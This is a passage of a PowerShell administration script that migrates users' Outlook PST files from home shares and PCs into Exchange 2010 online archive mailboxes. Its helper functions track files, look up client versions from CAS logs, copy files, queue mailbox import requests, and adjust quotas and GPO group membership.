This is created for each new PST discovered for any user
#>
$PSTObj = New-Object PSObject
$PSTObj | Add-Member -type NoteProperty -name UNCFullPathName -value (0)
$PSTObj | Add-Member -type NoteProperty -name LastWriteTime -value ("")
$PSTObj | Add-Member -type NoteProperty -name Size -value (0)
$PSTObj | Add-Member -type NoteProperty -name IgnoreFile -value ("FALSE")
$PSTObj | Add-Member -type NoteProperty -name DateRemoved -value ("")
$PSTObj | Add-Member -type NoteProperty -name BackupFolksNotified -value ("FALSE")
$PSTObj | Add-Member -type NoteProperty -name AgeInDays -value (0)
$PSTObj
}
Function Get-ArchPSTIndex ($PST=$null) {
<#
.SYNOPSIS
Creates or finds an index number for PST name.
.DESCRIPTION
Creates or finds an index number for PST name.
Uses the full UNC path for index building
#>
$Return = $null`
If ($Script:PSTIndex.ContainsKey($PST.VersionInfo.FileName)) {
# return the Index number
$Return = $PSTIndex.Item($PST.VersionInfo.FileName)
} Else {
# not found so this is a never before see file
# create the entry for the file
$PSTLog = New-ArchPSTFileLogObject
$PSTLog.UNCFullPathName = $PST.VersionInfo.FileName
$Script:ArchPSTQueue += $PSTLog
# create the index and add it to
$Script:PSTIndex.Add($PSTLog.UNCFullPathName,$Script:ArchPSTQueue.Count)
$Return = $Script:ArchPSTQueue.Count
}
$Return
}
Function New-ArchPSTFileLogObject(){
<#
.SYNOPSIS
Return a new object to track PST file.
.DESCRIPTION
Return a new object to track a PST file.
This is created for each new PST discovered for any users with an Archive Mailbox
#>
$PSTObj = New-Object PSObject
$PSTObj | Add-Member -type NoteProperty -name UNCFullPathName -value (0)
$PSTObj | Add-Member -type NoteProperty -name LastWriteTime -value ("")
$PSTObj | Add-Member -type NoteProperty -name Size -value (0)
$PSTObj | Add-Member -type NoteProperty -name IgnoreFile -value ("FALSE")
$PSTObj | Add-Member -type NoteProperty -name DateChecked -value ("")
$PSTObj | Add-Member -type NoteProperty -name BackupFolksNotified -value ("FALSE")
$PSTObj | Add-Member -type NoteProperty -name AgeInDays -value (0)
$PSTObj | Add-Member -type NoteProperty -name AcctName -value ("")
$PSTObj | Add-Member -type NoteProperty -name Dept -value ("")
$PSTObj | Add-Member -type NoteProperty -name Server -value ("")
$PSTObj | Add-Member -type NoteProperty -name DateDiscovered -value (Get-date)
$PSTObj | Add-Member -type NoteProperty -name DateCreated -value ("")
$PSTObj
}
Function Get-PSTFileIndex ($PST=$null) {
<#
.SYNOPSIS
Creates or finds an index number for PST name.
.DESCRIPTION
Creates or finds an index number for PST name.
Uses the full UNC path for index building
#>
$Return = $null`
Write-Host "Enter [Get-PSTFileIndex]: $(($PST).VersionInfo.FileName) Count: $(($Script:AllPSTQueue).Count)"
If ($Script:PSTIndex.ContainsKey($PST.VersionInfo.FileName)) {
# return the Index number
$Return = $Script:PSTIndex.Item($PST.VersionInfo.FileName)
Write-Host "Found [Get-PSTFileIndex]: $($Return)"
} Else {
# not found so this is a never before seen file
# create the entry for the file
$PSTLog = New-PSTFileLogObject
$PSTLog.UNCFullPathName = $PST.VersionInfo.FileName
Write-Host "Fullname $(($PSTLog).UNCFullPathName)"
Write-Host "Before: " $PSTLog
$Script:AllPSTQueue += $PSTLog
Write-host "After: " $Script:AllPSTQueue[-1]
# create the index and add it to
#$Script:PSTIndex.Add($_.UNCFullPathName,$i)
$Script:PSTIndex.Add($PSTLog.UNCFullPathName,($Script:AllPSTQueue).Count-1)
Write-Host "Added? : " $Script:PSTIndex.Get_item($PSTLog.UNCFullPathName)
$Return = ($Script:AllPSTQueue).Count -1
Write-host "Try to reindex in: " $Script:AllPSTQueue[($Return)]
Write-Host "Add [Get-PSTFileIndex]: $($Return)"
}
Write-Host "Leave [Get-PSTFileIndex]"
$Return
}
Function New-PSTJobObject() {
<#
.SYNOPSIS
Object for storing information about a PST Import Job.
.DESCRIPTION
Object for storing information about a PST Import Job.
A user many have many Jobs, one for each PST file being imported.
#>
$PSTJob = New-Object PSObject
# User Related
$PSTJob | Add-Member -type NoteProperty -name JobName -value ("") # <userobj>-<filename>
$PSTJob | Add-Member -type NoteProperty -name JobStatus -value ("") # <>
$PSTJob | Add-Member -type NoteProperty -name UserMBX -value ("") # DisplayName
$PSTJob | Add-Member -type NoteProperty -name UserEmail -value ("") # PrimarySMTPAddress
$PSTJob | Add-Member -type NoteProperty -name UserObj -value ("") # NTAccopuntName
$PSTJob | Add-Member -type NoteProperty -name HomeDir -value ("") # from QADuser
$PSTJob | Add-Member -type NoteProperty -name ClientVer -value ("") # from CAS logs if found
$PSTJob | Add-Member -type NoteProperty -name ClientVerOK -value ("") # True/False
# User PC Related
$PSTJob | Add-Member -type NoteProperty -name IP -value ("") # ComputerName, IP, or None (order of preference)
$PSTJob | Add-Member -type NoteProperty -name OSname -value ("") # X, 7, or none
# PST File Related
$PSTJob | Add-Member -type NoteProperty -name ProcessFile -value ($True) # for potentially turning off one PST in a group
$PSTJob | Add-Member -type NoteProperty -name OrgFileName -value ("") # should be file name only
$PSTJob | Add-Member -type NoteProperty -name OrgUNCName -value ("") # UNC file name Original location
$PSTJob | Add-Member -type NoteProperty -name TargetDir -value ("") # target directory for creation
$PSTJob | Add-Member -type NoteProperty -name TargetUNCName -value ("") # UNC file name Target location
$PSTJob | Add-Member -type NoteProperty -name FileSize -value (0) # file size in MB
$PSTJob | Add-Member -type NoteProperty -name FileLastWrite -value ("") # last write time of file
# Migration Related
$PSTJob | Add-Member -type NoteProperty -name TargetDB -value ("") # target archive mailbox location
$PSTJob | Add-Member -type NoteProperty -name MRServer -value ("") # which MRS server to use - depends on AD site
$PSTJob | Add-Member -type NoteProperty -name LastNumBI -value (0) # from results, how many bad items did we encounter?
$PSTJob | Add-Member -type NoteProperty -name UseTargetRootFolder -value ($true) # True/False
$PSTJob | Add-Member -type NoteProperty -name TargetRootFolder -value ("") # True/False
$PSTJob | Add-Member -type NoteProperty -name JobCreationTime -value ($null)
# Update Related
$PSTJob | Add-Member -type NoteProperty -name LastCheckTime -value ($null) # last time this entry processed
$PSTJob | Add-Member -type NoteProperty -name InProgressTime -value ($null) # from results
$PSTJob | Add-Member -type NoteProperty -name OverAllTime -value ($null) # from results
$PSTJob | Add-Member -type NoteProperty -name ExpandedErrs -value ($null) # any encountered errors
$PSTJob | Add-Member -type NoteProperty -name RegPSTGrow -value ($false) # has been added to group for GPO to PSTDisableGrow?- my signal this user is complete - check membership
$PSTJob | Add-Member -type NoteProperty -name SkipReason -value ("") # when a file is skipped, Size, Age, or Failed
$PSTJob
}
Function New-PSTReportObj (){
<#
.SYNOPSIS
PST Report Object for tracking the progress of PST migration.
.DESCRIPTION
PST Report Object for tracking the progress of users with
an Archive Mailbox and their progress at removing PST files
from their home drives.
#>
$ReportObj = New-Object PSObject
# OverallUser Info
$ReportObj | Add-Member -type NoteProperty -name DisplayName -value ("")
# PST Information
$ReportObj | Add-Member -type NoteProperty -name InUsePST -value (0)
$ReportObj | Add-Member -type NoteProperty -name HDrvPST -value (0)
$ReportObj | Add-Member -type NoteProperty -name HDrvSize -value (0)
$ReportObj | Add-Member -type NoteProperty -name ImpPST -value (0)
$ReportObj | Add-Member -type NoteProperty -name ImpSize -value (0)
$ReportObj | Add-Member -type NoteProperty -name TotalSize -value (0)
$ReportObj | Add-Member -type NoteProperty -name SkippedPST -value (0)
$ReportObj | Add-Member -type NoteProperty -name DaysSinceImport -value (0)
$ReportObj | Add-Member -type NoteProperty -name GPO -value ("")
$ReportObj | Add-Member -type NoteProperty -name '-' -value ("")
# General MBX INfo
$ReportObj | Add-Member -type NoteProperty -name MBXDB -value ("")
$ReportObj | Add-Member -type NoteProperty -name ArchDB -value ("")
$ReportObj | Add-Member -type NoteProperty -name MBXSize -value (0)
$ReportObj | Add-Member -type NoteProperty -name MBXQuota -value (0)
$ReportObj | Add-Member -type NoteProperty -name ArchSize -value (0)
$ReportObj | Add-Member -type NoteProperty -name ArchQuota -value (0)
$ReportObj | Add-Member -type NoteProperty -name InitArchSize -value (0)
$ReportObj | Add-Member -type NoteProperty -name ArchGrowth -value (0)
$ReportObj | Add-Member -type NoteProperty -name DateCreated -value ((Get-Date))
$ReportObj
}
Function Reset-PSTBackupFileNames () {
<#
.SYNOPSIS
Reset Backup file names to current time
.DESCRIPTION
Reset them all so that you'll be guaranteed to have the correct
name each time
#>
$Script:TE = Get-Date -Format yyyyMMddhhmmss # today extended
$Script:ImportQueueFileBU = $Script:PSTShareDir + '\\ZZSavedQueueLogs\\PSTImportJobQueue' + "-" + $Script:TE + ".csv"
$Script:CompleteQueueFileBU = $Script:PSTShareDir + '\\ZZSavedQueueLogs\\PSTImportCompleteQueue' + "-" + $Script:TE + ".csv"
$Script:ArchReportFileBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\ArchiveReport-' + $Script:TE + '.csv'
$Script:ArchPSTFileBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\ArchivePSTHistory-' + $Script:TE + '.csv'
$Script:AllPSTFileLogBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\AllPSTHistory-' + $Script:TE + '.csv'
}
#=============================================================================
# Helper Functions
#=============================================================================
Function CC () {
<#
.SYNOPSIS
a utility to return the count of members in a collection
.DESCRIPTION
a utility to return the count of members in a collection
0, 1, or many ...
#>
Param (
$Col
)
if ($Col) {
if ($Col.Count -eq $null) {
$Cnt = 1
} Else {
$Cnt = $Col.Count
}
} Else {
$Cnt = 0
}
$Cnt
}
Function isMemberOf() {
<#
.SYNOPSIS
A utility to check if a mailbox is a member of a group.
.DESCRIPTION
A utility to check if a mailbox is a member of a group.
#>
Param (
[string] $groupName,
[string] $MemberName # displayname
)
$m = Get-QADGroupMember $groupName -SizeLimit 0 | where { $_.Displayname -eq $memberName }
if($m) {$true} else {$false}
}
Function WhoAmI () {
<#
.SYNOPSIS
sometimes you want to know who is running this job ;)
.DESCRIPTION
ometimes you want to know who is running this job ;)
#>
([System.Security.Principal.WindowsIdentity]::GetCurrent()).Name
}
Function Get-ISODayOfWeek {
<#
.SYNOPSIS
Get the correct (according to ISO 8601) day of the week
.DESCRIPTION
For any given date you get the day of the week, according to ISO8610
.PARAMETER Date
The date you want to analyze. Accepts dates on the pipeline
#>
Param([DateTime]$date=$(Get-Date))
Process {
if($_){$date=$_}
@(7,1,2,3,4,5,6)[$date.DayOfWeek]
}
}
Function Get-FreeDiskSpace($drive,$computer) {
<#
.SYNOPSIS
Utility to discover the free space of a drive
.DESCRIPTION
Utility to discover the free space of a drive
Used to decide if there is enough space to copy a PST file
to either the Temp processing area, or to the local PC for backup.
#>
$driveData = Get-WmiObject -class win32_LogicalDisk -computername $computer -filter "Name = '$drive'"
#"$computer free disk space on drive $drive"
"{0:n2}" -f ($driveData.FreeSpace/1MB)
}
Function ConvertTo-ComputerName() {
<#
.SYNOPSIS
Resolve the IP to a computer name
.DESCRIPTION
CAS logs record IP address for a user, but those can change over time
resolve the IP to a computer name to save in the PST Job Queue
- try to look up in DNS
- 90% of time this will be an IP
#>
Param (
$FindName
)
$Return = $null
$ErrorActionPreference = "SilentlyContinue"
$c = [System.Net.Dns]::GetHostbyAddress($FindName).HostName
$ErrorActionPreference = "Continue"
if ($c) {
$Return = ($c.Split(".")[0]).ToUpper()
} Else {
$Return = $FindName
}
$Return
}
Function ConvertTo-IP () {
<#
.SYNOPSIS
Lookup IP using the ComputerName
.DESCRIPTION
CAS logs record IP address for a user, but those can change over time
resolve the IP to a computer name to save in the PST Job Queue
#>
Param ($FindName)
$Return = $null
$ErrorActionPreference = "SilentlyContinue"
$c = [System.Net.Dns]::GetHostEntry($FindName).Addresslist[0].ToString()
$ErrorActionPreference = "Continue"
if ($c) {
$Return = ($c.Split(".")[0]).ToUpper()
} Else {
$Return = $FindName
}
$Return
}
Function Clean-OnlinePSTGPO(){
<#
.SYNOPSIS
Clear up GPO group and make sure it has only the correct members
.DESCRIPTION
Clear up GPO group and make sure it has only the correct members
.Notes
In our world, there are 2 types of PST file users: Controled and Non-Controlled
Controled Users:
New users created after a certain date (1FEB2012) and Users migrated to
Online PSTs
Non-Controlled Users:
Those users created befor 1FEB2012 and not having been migrated.
Eventually the Non-Controlled user will disappear. At least, we can hope.
#>
$GPO = get-group 'GPO-ReadOnlyPST' | select -ExpandProperty Members
$GPO | %{
Write-Host "Working " $_.ToString()
$Dumpable = $false
$Reason = "None"
$MBX = get-mailbox $_.ToString()
# Does User even have a mailbox?
if(! (($MBX).DataBase.Name)) {
$Dumpable = $true
$Reason = "NoMailbox"
}
Elseif (!(($MBX).ArchiveDataBase.Name)) {
#Has Mailbox but No Archive
if ((get-date '2/1/2012') -gt (get-date ($MBX).WhenMailboxCreated)){
$Dumpable = $true
$Reason = "No archive and 2/1/2012 is greater than " + $(($MBX).WhenMailboxCreated)
}
}
if ($Dumpable){
#remove them from the group (GPO).
Write-Host "Removing: " ($MBX).Displayname " - " $Reason
Remove-QADGroupMember -Identity 'GPO-ReadONlyPST' -Member $_.ToString()
}
}
# "{0,30}`t{1,10}`t{2,25}" -f (($MBX).DataBase.Name), (($MBX).ArchiveDataBase.Name),((get-date '2/1/2012') -gt ($MBX).WhenMailboxCreated)}
}
#=============================================================================
# User Obj Functions - Done
#=============================================================================
Function Add-ToGPO ($User = $null) {
<#
.SYNOPSIS
Add user to a group that defines scope of GPO to Disallow PST Growth
.DESCRIPTION
In our organization our GPO that disallows PST growth is governed by a
group during the transition, later we can apply that setting worldwide.
For users to be comfortable, they need to Read their old PST files
They can then check our work for themselves. #WarmAndFuzzyFactor
These skipped users are legal discovery people that need to continue to
create PSTs as they gather info for Lawyer types.
#>
if ($User) {
if (-not ($Script:IgnoreUser -contains (get-mailbox $User).SamAccountName)) {
Add-QADGroupMember -Identity 'gpo-ReadonlyPST' -Member (get-mailbox $User).SamAccountName
}
}
}
Function Adjust-Quota ($User = $null) {
<#
.SYNOPSIS
Make sure people are not hit by a quota during their transition.
.DESCRIPTION
Make sure people are not hit by a quota during their transition Set new
quota to 500MB -- unless theie quota is already huge
#>
if ($User) {
$MBX = get-mailbox $User
# what is current quota
$UsingDBQuotas = $MBX.UseDatabaseQuotaDefaults
if ($UsingDBQuotas -eq $True){
$Database = Get-MailboxDatabase -Identity $MBX.Database
$ProhibitSendQuota = $Database.ProhibitSendQuota.value.ToMB() -as [Int]
$IssueWarningQuota = $Database.IssueWarningQuota.value.ToMB() -as [Int]
} Else {
$ProhibitSendQuota = $MBX.ProhibitSendQuota.value.ToMB() -as [Int]
$IssueWarningQuota = $MBX.IssueWarningQuota.value.ToMB() -as [Int]
}
$NewProhibitSendQuota = 500 -as [int]
$NewIssueWarningQuota = 450 -as [int]
# this has bit me b4, so changed it to "-as [int]" above for better results
if($NewIssueWarningQuota -gt $IssueWarningQuota) {
Set-Mailbox -Identity $MBX -UseDatabaseQuotaDefaults:$False -ProhibitSendQuota 500MB -IssueWarningQuota 450MB -ProhibitSendReceiveQuota "Unlimited"
}
}
}
Function Get-ClientAccessUserLog () {
<#
.SYNOPSIS
Discover a user's Client and IP information.
.DESCRIPTION
Discover a user's client and IP information. Script uses this function too.
There is also nightly process that runs which gets all the "connect" log
entries for OUTLOOK.EXE. It's run overnight. Initially we were looking at all
the logs and that was very teadious. Now we search an already created subset.
It's best to pass in the LegacyExchangeDN and SAMAccountName from the mailbox object
from testing it seems to get better results right now using both
There is no way of knowing where this user logged in so we must search
all CAS servers until we find a "connect" entry and pass the full line back
Also users can log in from many PCs -- we only want the most used
so look thru the full day and get all info you can, then group by IP and
take the one with the most connects.
alas, sometimes you won't find anything ...
#>
param (
$DisplayName = $null,
$SamName = $null,
$LegacyName = $null,
$IP = $null,
$SearchDays = 14,
[switch]$Quiet
)
#-----------------------------------------------------------------
$Results = @()
If($DisplayName) {
#ignore all the other cmdline entries and use this to grab those
$MB = Get-SingleMailboxObject $DisplayName
$LegacyName = $MB.LegacyExchangeDN
$SamName = $MB.SamAccountName
} Elseif ($IP) {
$LegacyName = $IP
}
$Days = -1
Do {
$Y = Get-Date $((get-date).adddays($Days)) -Format yyyyMMdd
if (!($Quiet)) {Write-Host "Searching "$Y}
if(Test-path ($Script:CASConnectLogDir + "\\olConnect-"+$Y+"*")) {
$tmpResults = gc (gci ($Script:CASConnectLogDir + "\\olConnect-"+$Y+"*")) | ?{($_ -match ($LegacyName + ",")) -and ($_ -match ",,Outlook") -and ($_ -match "Connect,")}
#Write-Verbose "Found: [$($tmpResults.count)]"
if($tmpResults) {
$tmpResults | %{$Results += $_}
}
}
$Days--
} While (!($Results) -And ($Days -gt ($SearchDays * (-1))))
if ($Results) {
#split the line(s) found into Name, Version, and IP, and mode
$c = $Results | %{"{0};{1};{2};{3}" -f $_.Split(",")[3],$_.Split(",")[6],$_.Split(",")[8],$_.Split(",")[7]}
# this will sort the ips to the most common one, ie: users logs into 6 machines,
# but 1 was 12 times and all the others was 1 each, we get the 12 times
$d = $c | %{if($_.split(";")[2]){$_.Split(";")[2]}} | group -NoElement | sort -Descending
if($d){
#Just give me the entries with my most common IP
$e = $c | ?{$_ -match $d.Values}
}
#return what you found...
if ($e.count) {
# Returning 1st entry in array with ips
$e[0]
} Elseif ($e) {
# Returning only entry with ip
$e
} Else {
if ($c.count) {
# Returning 1st entry in array with no IP
$c[0]
} Else {
# Returning only entry with no IP
$c
}
}
}
}
Function Get-MRServer ($MBX = $null) {
<#
.SYNOPSIS
Pick an MRSServer in the same AD Site as the destination MBX Database.
.DESCRIPTION
If you are using deticated CAS servers to import the PST files use this function
to pick the correct one. Pick the wrong MRServer and the Import will never
start - here I pick the an MR Server in the Same AD Site using the CAS as a
guide we have dediticated "pst import" CAS servers.
We are chosing the One CAS server we have designated to heap many request
upon so we don't effect user's normal performance on production CAS servers.
.NOTES
We have since moved all our live copies of each Archive Mailboxdatabase to the
same AD site.
It is also possible to skip this step, and let exchange pick a cas server.
Depends on how much you are moving and how you feel that will effect your users
See "Import-PSTFromShare"
#>
#---------------------------------------------------------------------
$Return = $null
# If ($MBX) {
# if (((get-mailboxdatabase $mbx.database.Name).RpcClientAccessServer) -match "^ad01") {
# $Return = "cas02.domain.com"
# } Else {
# $Return = "cas04.domain.com"
# }
# }
# ====> TO DO ====
# you will need to replace this with your cas server
# or adjust the code above to pick the correct one
$Return = "cas02.domain.com"
$Return
}
Function Get-OutlookEXEVersion () {
<#
.SYNOPSIS
Discover the version of Outlook on a PC
.DESCRIPTION
Discover the version of Outlook on a PC
There are many version and many people do not have a
compatible version with Exchange 2010 Archive Mailbox
#>
param(
$ComputerName = $null
)
$OL = $Null
if($ComputerName) {
if (Test-Connection -ComputerName $ComputerName -Quiet -Count 1) {
Write-Verbose "Trying $ComputerName"
If ( Test-path ('\\\\' + $ComputerName + '\\C$\\Program Files (x86)\\Microsoft Office\\Office14\\outlook.exe')) {# office 2010 (32b) on 64bit
Write-Verbose "Office 2010 on 64bit"
$OL = gci ('\\\\' + $ComputerName + '\\c$\\Program Files (x86)\\Microsoft Office\\Office14\\outlook.exe')
} ElseIf (Test-path ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\Office14\\outlook.exe')) { # office 2010 on 32bit
Write-Verbose "Office 2010"
$OL = gci ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\Office14\\outlook.exe')
} ElseIf (Test-path ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\Office12\\outlook.exe')) { # office 2007
Write-Verbose "Office 2007"
$OL = gci ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\Office12\\outlook.exe')
} Else {
#check to see if this is (oh my god!) a 2003 client
if (Test-Path ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\OFFICE11\\outlook.exe')) {
Write-Verbose "Office 2003"
$OL = gci ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\OFFICE11\\outlook.exe')
} Else {
Write-Verbose "Can't determine Outlook version [$ComputerName]"
}
}
} Else {
Write-Warning "[$ComputerName] is not responding"
}
} Else {
Write-Verbose "missing computername [$ComputerName]"
}
$OL.VersionInfo.ProductVersion
}
Function Get-SingleMailboxObject($Name = $null) {
<#
.SYNOPSIS
Return a single mailbox
.DESCRIPTION
Since we are importing mail and humans can be error prone,
make absolutely sure we only get one hit on the requested mailbox
#>
#-----------------------------------------------------------------
$ReturnMBX = $null
if ($Name) {
$MBX = get-mailbox $Name -EA 0
if (!($MBX.Count)) { # is it less than two?
if ($MBX) { # is it more than zero
$ReturnMBX = $MBX # Return the one
}
}
}
$ReturnMBX
}
Function New-OnlineArchiveByJob($JobObj = $null) {
<#
.SYNOPSIS
Based on Job information, give user Online PST feature.
.DESCRIPTION
If this job's user is not enabled for online archive
then create one in the smallest database.
The smallest DB was determined during the "add-PSTImportQueue"
($JobObj.TargetDB)
#>
$Return = $false
if ($JobObj) {
$MBXObj = Get-SingleMailboxObject $JobObj.UserEmail
#Write-Verbose "User DisplayName : $($mbxObj).Displayname) Derived from $($JobObj.UserEmail)"
# this will either fail, create, or do nothing ;)
Enable-Mailbox -Archive -Identity $mbxObj -ArchiveDatabase ($JobObj.TargetDB) -ArchiveName $('Online PST - ' + ($mbxObj).Displayname) -ea 0
# just a buffer
sleep -Seconds 5
# Adjust Quota so this user is not prohibited during migration
Adjust-Quota $MBXObj
# reload to capture changes
$MBXObj = Get-SingleMailboxObject $JobObj.UserEmail
If ($MBXObj.ArchiveDatabase) {
$Return = $true
#Write-Verbose "User has Archve!"
} Else {
$Return = $false
#Write-Verbose "User has NO Archve!"
}
}
$Return
}
Function Test-OutlookClientVersion ($V = $null) {
<#
.SYNOPSIS
Test Oulook.exe version
.DESCRIPTION
older outlook clients can't see the "Online Archive"
so flag those users who need an upgrade
12.0.6550.5000 is the minimum level - buggy
12.0.6607.xxxx is Office 2007 SP3 -- preferred level
there are search bugs in earlier versions
14.0.6109.5005 is outlook 14 patched to Nov 8, 2011
14.0.6117.5xxx is patched thru April 2012 -- preferred
#>
$VOK = $False
if($V) {
if ($V.Split(".")[0] -eq 14) {
# Outlook 2010 (32bit) 14.0.4760.1000
if ($V.Split(".")[2] -ge 4760) {$VOK = $true}
} Elseif ($V.Split(".")[0] -eq 12) {
# Outlook 2007 (32bit) 12.0.6550.5000 (or above)
if ($V.Split(".")[2] -ge 6550) {$VOK = $true}
}
}
$VOK
}
#=============================================================================
# PST File Functions
#=============================================================================
Function Copy-PSTtoImportShare($Path=$Null, $Dest=$null){
<#
.SYNOPSIS
copy the pst to our share folder
.DESCRIPTION
Copy the pst to our share folder using Copy-item in the same local AD site
works fine. Using BITS when copying over WAN lines
#>
$Result = "Fail" # Copied or Error(s)
#Write-Verbose "Copy From: $Path To: $Dest"
if($Path -and $Dest ) {
$NewFile = Copy-Item -Path $Path -Destination $Dest -PassThru
if ($NewFile){
$Result = "Copied"
} Else {
# return the last error
$Result = $error[0].Exception
Write-Verbose "Copy ResultFrom: $($error[0].Exception)"
}
}
$Result
}
Function Copy-PSTusingBITS ($JobObj = $null) {
<#
.SYNOPSIS
copy the pst to our share folder
.DESCRIPTION
Copy the pst to our share folder using Copy-item in the same local AD site
works fine. Using BITS when copying over WAN lines
#>
$Result = $false
if ($JobObj) {
$params = @{
Source = ($Jobobj.OrgUNCName)
Destination = ($Jobobj.TargetUNCName)
Description = ("Online PST BITS Copy")
DisplayName = ($JobObj.JobName)
Asynchronous = $true
Priority = "Normal"
}
$Result = Start-BitsTransfer @params
}
$Result = $null
sleep 2
$Result = Get-BitsTransfer | Where-Object { $_.DisplayName -eq ($ThisJob.JobName) }
$Result
}
Function Get-PSTFileList() {
<#
.SYNOPSIS
Discover PST Files in folders
.DESCRIPTION
Discover PST Files in folders
.NOTES
- Some AD objects do not have a home directory
- Allowed for some results of *.pst being directories
#>
param(
$Homedir = $null,
$PCIP = $null,
$SearchPC = $false,
$OS = $null,
$UN = $null,
$SourceDir=$null
)
$HDFiles = $null
$PCFIles = $null
#Write-Verbose "Get-PSTFileList $HomeDir $PCIP $SearchPC $OS $UN"
# assuming SourceDir is a specific target dir
if(!($SearchPC) -and $SourceDir) {
Write-host "`t-> Override HomeDir: $HomeDir to $SourceDir"
$Homedir = $SourceDir
}
If ($Homedir){
if(Test-Path $HomeDir) {
Write-Verbose "`t`t-> Searching $HomeDir"
# ensure this is an array even if we have only one entry
[array]$HDFiles = gci -path $HomeDir -Filter '*.pst' -Recurse -Force -EA 0 | ?{$_.PSIsContainer -eq $false}
}
}
if($SearchPC -and $PCIP) {
if(Test-Connection $PCIP -Count 1 -Quiet) {
$PCDir = $null
if($SourceDir) {
$PCDir = $SourceDir
} Else {
if($OS -match "7") {
Write-Verbose "`t`t-> Searching Windows7 PC $UN"
$PCDir = $("\\\\" + $PCIP + "\\C$\\Users\\" + $UN + "\\AppData\\Local\\Microsoft\\Outlook")
} Elseif ($OS -match "XP") {
Write-Verbose "`t`t-> Searching WindowsXP PC $UN"
$PCDir = $("\\\\" + $PCIP + "\\C$\\Documents And Settings\\" + $UN)
} Else {
#we don't know OS, so test them and see which flies
Write-Verbose "`t`t-> OS not known, testing for OS :"
if(Test-Path ("\\\\" + $PCIP + "\\C$\\Users\\" + $UN + "\\AppData\\Local\\Microsoft\\Outlook")) {
Write-Verbose "`t`t-> Try Windows7"
$PCDir = "\\\\" + $PCIP + "\\C$\\Users\\" + $UN + "\\AppData\\Local\\Microsoft\\Outlook"
} Elseif (Test-Path ("\\\\" + $PCIP + "\\C$\\Documents And Settings\\" + $UN)){
Write-Verbose "`t`t-> Try WindowsXP"
$PCDir = $("\\\\" + $PCIP + "\\C$\\Documents And Settings\\" + $UN)
} Else {
Write-Verbose "`t`t-> OS Unknown"
$PCDir = $("\\\\" + $PCIP + "\\c$")
}
}
}
#if have a legit dir or just the whole c drive ...
Write-Verbose "`t`t-> Searching $PCDir"
If(Test-Path $PCDir) {
[array]$PCFIles = gci -path ($PCDir) -Filter '*.pst' -Recurse -Force -EA 0 | ?{$_.PSIsContainer -eq $false}
}
} Else {
Write-Output ("`t-> $PCIP is not responding.")
}
}
if($HDFiles -and $PCFIles){
$Files = $HDFiles + $PCFIles
} Elseif ($HDFiles -and (-not $PCFIles)){
$Files = $HDFiles
} Elseif ((-not $HDFiles) -and $PCFIles){
$Files = $PCFIles
} Else {
$Files = $null
}
$Files
}
Function Import-PSTFromShare($JobObj){
<#
.SYNOPSIS
import into the Archive mailbox
.DESCRIPTION
import into the Archive mailbox
.NOTES
We found that 99% of the people wanted to keep their data separate after the
import, just like it was in their PST files, so UseTargetRootFolder was
defaulted to true in the NEw-PSTJobObject function
We check here for false.
#>
$Return = "Failed"
$Error.Clear | Out-Null
$MBXName = $JobObj.UserObj
$User = $JobObj.UserObj.Split("\\")[1]
$File = $JobObj.TargetUNCName
$JobName = $JobObj.JobName
$CAS = $JobObj.MRServer
if ($JobObj.TargetRootFolder) {
$Folder = $JobObj.TargetRootFolder
} Else {
$Folder = $JobObj.OrgFileName
}
Write-Debug "$MBXName -Name $JobName -Batchname $USER -MRSServer $CAS -TargetDB $JobObj.TargetDB"
# import the pst
#======= TO DO ============
# remove the -MRSServer $CAS - if you want Exchange to choose the CAS server every time.
if($JobObj.UseTargetRootFolder -eq "TRUE") {
$PSTQueued = New-MailboxImportRequest -Name $JobName -BatchName $USER -Mailbox "$MBXName" -FilePath "$File" -IsArchive -MRSServer $CAS -BadItemLimit 9999 -AcceptLargeDataLoss -Confirm:$false -targetrootfolder $Folder
} Else {
$PSTQueued = New-MailboxImportRequest -Name $JobName -BatchName $USER -Mailbox "$MBXName" -FilePath "$File" -IsArchive -MRSServer $CAS -BadItemLimit 9999 -AcceptLargeDataLoss -Confirm:$false
}
If($PSTQueued) {
$Return = $PSTQueued.Status
} Else {
$Return = $Error[0].ToString()
}
sleep -Seconds 5
$Return
}
Function Move-PSTToLocal ($IP=$null, $PSTFiles=$null, $SamAcct=$null, $IgnoreAge=$False) {
<#
.SYNOPSIS
clear PST files off the Home shares
.DESCRIPTION
The botton line of this project is to clear PST files off the Home shares
If the PST file has been imported the file itself has become a backup
and as such is safe to put on the local PC of the user.
.NOTES
Move PSTs
If this is a windows 7 box and has 2010 this might be the place to put them
\\\\172.18.20.1\\c$\\Users\\<user>\\Documents\\Outlook Files
but this is good for XP
\\\\172.18.20.1\\c$\\D9ocuments and Settings\\<user>\\My Docuemtns\\Outlok Files
If this user is in a far away place, then do NOT push the data back to the PC
#>
Write-Host "Starting = Who:($SamAcct), Count:($(($PSTFiles).Count)), Computer:($IP)"
$HQUser = $true
$Region = (get-mailbox $SamAcct).CustomAttribute2
If (($Region -eq "Asia") -or ($Region -eq "Europe")) {$HQUser = $false}
if ($IP -eq "None") {$IP = $null}
if($IP -and $PSTFIles -and $SamAcct -and $HQUser) {
#make sure we can ping the PC
Write-Host $("$SamAcct; Starting Move-PSTFiles $(get-date)")
$("$SamAcct; Starting Move-PSTFiles $(get-date)") >> $Script:MoveFileLog
if (Test-Connection -ComputerName $IP -Quiet){
Write-Host $("$SamAcct; Connect to $IP passed")
$("$SamAcct; Connect to $IP passed") >> $Script:MoveFileLog
# both return MB
$AvailableSpace = [int](get-freediskspace 'c:' $IP)/2
$PSTFiles = $PSTFiles | Sort Length
$PSTSize = (($PSTFIles | Measure-Object Length -sum).Sum)/(1024*1024)
$OldPSTSize = ((($PSTFIles | ?{$_.LastWriteTime -le (get-date ((get-date).adddays(-90))) } | Measure-Object Length -sum).Sum)/(1024*1024))
$Continue = $false
if (Test-Path $('\\\\' + $IP + '\\c$\\users\\' + $SamAcct)) {
# Put them in this dir structure, create or use Outlook Files dir
$LocalBU = $('\\\\' + $IP + '\\c$\\users\\' + $SamAcct+ '\\Documents\\Outlook Files')
if (!(Test-Path $LocalBU)){ mkdir $LocalBU }
